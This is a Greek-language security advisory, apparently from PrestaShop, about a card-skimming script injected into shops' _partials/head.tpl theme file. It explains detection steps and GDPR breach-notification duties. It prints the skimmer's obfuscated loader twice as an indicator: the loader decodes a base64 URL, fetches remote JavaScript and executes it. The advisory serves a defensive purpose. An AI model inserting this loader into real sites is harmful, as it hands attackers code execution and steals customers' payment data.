Ειδοποίηση ασφαλείας –
Συνιστώμενος έλεγχος των
καταστημάτων σας
Πρόσφατα εντοπίσαμε μια απειλή ασφαλείας που επηρεάζει ορισμένα ηλεκτρονικά καταστήματα στο οικοσύστημα PrestaShop. Εντοπίστηκε ένα κακόβουλο σενάριο («digital skimmer») που ενδέχεται να έχει οδηγήσει στην κλοπή ορισμένων στοιχείων πληρωμής των πελατών σας.
Ημερομηνία: 12/02/2026
Τι κάνει αυτό το digital skimmer;
Αυτό το κακόβουλο λογισμικό λειτουργεί αντικαθιστώντας τα νόμιμα κουμπιά πληρωμής στη σελίδα ολοκλήρωσης της αγοράς με ψεύτικα κουμπιά. Όταν ένας πελάτης κάνει κλικ σε ένα από αυτά τα ψεύτικα κουμπιά, ανακατευθύνεται σε μια πλαστή φόρμα πληρωμής που έχει σχεδιαστεί για να συλλέξει τα στοιχεία πληρωμής του.
Το skimmer φορτώνεται απλά μέσω μιας ετικέτας <script>, που είναι γραμμένη απευθείας στο αρχείο _partials/head.tpl του ενεργού θέματος του καταστήματος. Αυτό σημαίνει ότι ο εισβολέας μπόρεσε να τροποποιήσει ένα αρχείο στο κατάστημα.
Πώς μπορώ να ελέγξω αν το κατάστημά μου επηρεάζεται;
Στο front office
Στον διακομιστή σας
Στο front office
Μπορείτε να ελέγξετε τον κωδικό του front office σας, ελέγχοντας μια σελίδα στον ιστότοπό σας (κάντε δεξί κλικ και, στη συνέχεια, επιλέξτε «επιθεώρηση»). Κοιτάξτε μέσα στην ετικέτα <script>. Αν βρείτε τον ακόλουθο κωδικό, αυτό σημαίνει ότι το κατάστημά σας επηρεάζεται:
<script>(function(){var x=new XMLHttpRequest;
x.open(‘GET’,atob(‘aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz’));
x.onload=function(){if(200===x.status)
try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Σημείωση: Το τμήμα aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz αλλάζει κάθε φορά, αλλά η δομή του κώδικα παραμένει η ίδια και η συνάρτηση atob() χρησιμοποιείται πάντα. Μπορεί να υπάρχει κώδικας πριν ή μετά (ο skimmer προσπαθεί να συγκαλύψει τον εαυτό του με μικρές διαφορές σε κάθε κατάστημα).
Στον διακομιστή σας
Εάν προτιμάτε να ελέγξετε τα αρχεία σας, μπορείτε να βρείτε την ίδια ετικέτα σε ένα αρχείο στον διακομιστή σας. Συνδεθείτε στον διακομιστή σας μέσω FTP και, στη συνέχεια, περιηγηθείτε στον φάκελο θεμάτων, στον φάκελο ενεργών theme > tepmlate folder > φάκελο _partial > head.tpl. Σε αυτό το αρχείο, κάντε δεξί κλικ και, στη συνέχεια, επιλέξτε «προβολή/επεξεργασία» και αναζητήστε την ίδια ετικέτα:
<script>(function(){var x=new XMLHttpRequest;
x.open(‘GET’,atob(‘aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz’));
x.onload=function(){if(200===x.status)
try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Τι πρέπει να κάνω αν το κατάστημά μου έχει επηρεαστεί;
Επικοινωνήστε με την εταιρεία σας ή την υποστήριξη της PrestaShop.
Πρέπει να ενημερώσω τους πελάτες μου;
Ως υπεύθυνοι επεξεργασίας δεδομένων κατά την έννοια του GDPR, είναι δική σας ευθύνη να αξιολογήσετε εάν έχει συμβεί παραβίαση δεδομένων και, εάν ναι, να προβείτε στις απαιτούμενες ειδοποιήσεις. Σύμφωνα με τα άρθρα 33 και 34 του GDPR, κάθε παραβίαση που ενδέχεται να θέσει σε κίνδυνο τα δικαιώματα και τις ελευθερίες πρέπει να αναφερθεί στην CNIL εντός 72 ωρών και στα επηρεαζόμενα άτομα σε περίπτωση υψηλού κινδύνου (ένας πρακτικός οδηγός είναι διαθέσιμος στον ιστότοπο της CNIL).
Σε αυτό το στάδιο, συνιστούμε ανεπιφύλακτα να πραγματοποιήσετε έναν διεξοδικό έλεγχο ασφαλείας των καταστημάτων PrestaShop και να βεβαιωθείτε ότι κανένα από αυτά δεν έχει παραβιαστεί.
Πηγή: prestashop.com
